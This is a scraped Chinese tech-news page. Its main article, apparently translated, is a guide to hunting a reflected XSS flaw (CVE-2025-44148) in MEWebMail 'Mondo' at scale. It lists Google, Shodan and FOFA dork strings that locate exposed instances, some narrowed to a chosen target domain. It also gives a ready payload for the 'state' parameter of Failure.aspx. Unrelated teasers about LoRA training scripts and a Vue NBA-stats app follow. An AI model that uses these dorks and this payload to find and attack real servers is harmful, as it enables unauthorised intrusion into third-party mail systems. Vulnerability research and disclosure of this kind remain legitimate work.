news 2026/5/1 10:53:31

XSS大规模挖掘实战:利用谷歌、Shodan等平台发现CVE-2025-44148漏洞

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
XSS大规模挖掘实战:利用谷歌、Shodan等平台发现CVE-2025-44148漏洞

XSS大规模挖掘:CVE-2025-44148

Google + Shodan + FOFA + ZoomEye Dorking

作者:Abhirup Konwar
2025年8月24日

1️⃣ Google Dorking

inurl:/Mondo/lang/sys

然后,只需在下方端点后追加XSS载荷,将其设置为参数“state”的值。首先将“Login.aspx”替换为“Failure.aspx”。

/Mondo/lang/sys/Failure.aspx?state=%22;}alert(1);function%20test(){%22

(按回车或点击查看完整尺寸图片)

2️⃣ Shodan Dorking

(200+ 条结果)

http.html:"/MEWebMail/Mondo"

目标过滤

http.html:"/MEWebMail/Mondo" hostname:target.com

http.html:"/MEWebMail/Mondo" ssl.cert.subject.cn:target.com

2个重要的切面分析:

  • Domain
  • ssl.cert.subject.cn

(按回车或点击查看完整尺寸图片)

3️⃣ FOFA Dorking

(2000+ 条结果)

body="/MEWebMail/Mondo"

(按回车或点击查看完整尺寸图片)
CSD0tFqvECLokhw9aBeRqqjH1LDrKjpa6GLzq6aSalFOjy8LSkMQVhDym9Ro/PPKMi9i/0fzjc/f5q2BMEcWEfNONvpLsiL2V46Jeoq6iJI=
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/1 4:46:03

八一建军节国防教育:lora-scripts生成现代化军队形象图

八一建军节国防教育:用 lora-scripts 生成现代化军队形象图 在八一建军节这样一个特殊节点,如何借助前沿技术讲好中国军队的故事?随着公众对视觉化、沉浸式内容的需求日益增长,传统的宣传素材已难以满足新时代国防教育的传播需求。…

作者头像 李华
网站建设 2026/5/1 4:45:38

lora-scripts配置文件详解:手把手教你修改关键训练参数

lora-scripts配置文件详解:手把手教你修改关键训练参数 在AIGC(生成式人工智能)迅速普及的今天,越来越多的创作者和开发者希望用自己的数据训练专属模型——无论是复刻某种艺术风格、定制角色形象,还是微调大语言模型完…

作者头像 李华
网站建设 2026/5/1 4:44:13

一带一路技术输出:阿拉伯语版lora-scripts教程助力全球普及

一带一路技术输出:阿拉伯语版lora-scripts教程助力全球普及 在人工智能技术席卷全球的今天,一个来自沙特的设计师正试图用AI生成融合阿拉伯书法与赛博朋克美学的城市景观。他没有昂贵的GPU集群,也不精通PyTorch底层API——但通过一套名为 lor…

作者头像 李华
网站建设 2026/5/1 4:46:45

小程序smNBA球员数据统计管理系统演 vue

文章目录小程序与Vue结合的NBA球员数据统计管理系统主要技术与实现手段系统设计与实现的思路系统设计方法java类核心代码部分展示结论源码lw获取/同行可拿货,招校园代理 :文章底部获取博主联系方式!小程序与Vue结合的NBA球员数据统计管理系统 该系统采用…

作者头像 李华
网站建设 2026/5/1 4:46:39

IT认证考试新题型:考察考生对lora-scripts配置文件的理解能力

IT认证考试新题型:考察考生对lora-scripts配置文件的理解能力 在生成式AI快速普及的今天,企业不再满足于“会用模型”,而是越来越关注“能否定制模型”。无论是为品牌打造专属画风的Stable Diffusion风格LoRA,还是为客服系统微调出…

作者头像 李华
网站建设 2026/4/30 23:52:42

在线教育平台整合:将lora-scripts训练功能嵌入AI课程实训环节

在线教育平台整合:将lora-scripts训练功能嵌入AI课程实训环节 在高校AI课程的教学实践中,一个长期存在的矛盾日益凸显:学生对生成式AI充满兴趣——他们想训练自己的绘画风格模型、打造专属聊天机器人,但面对动辄上千行的训练脚本…

作者头像 李华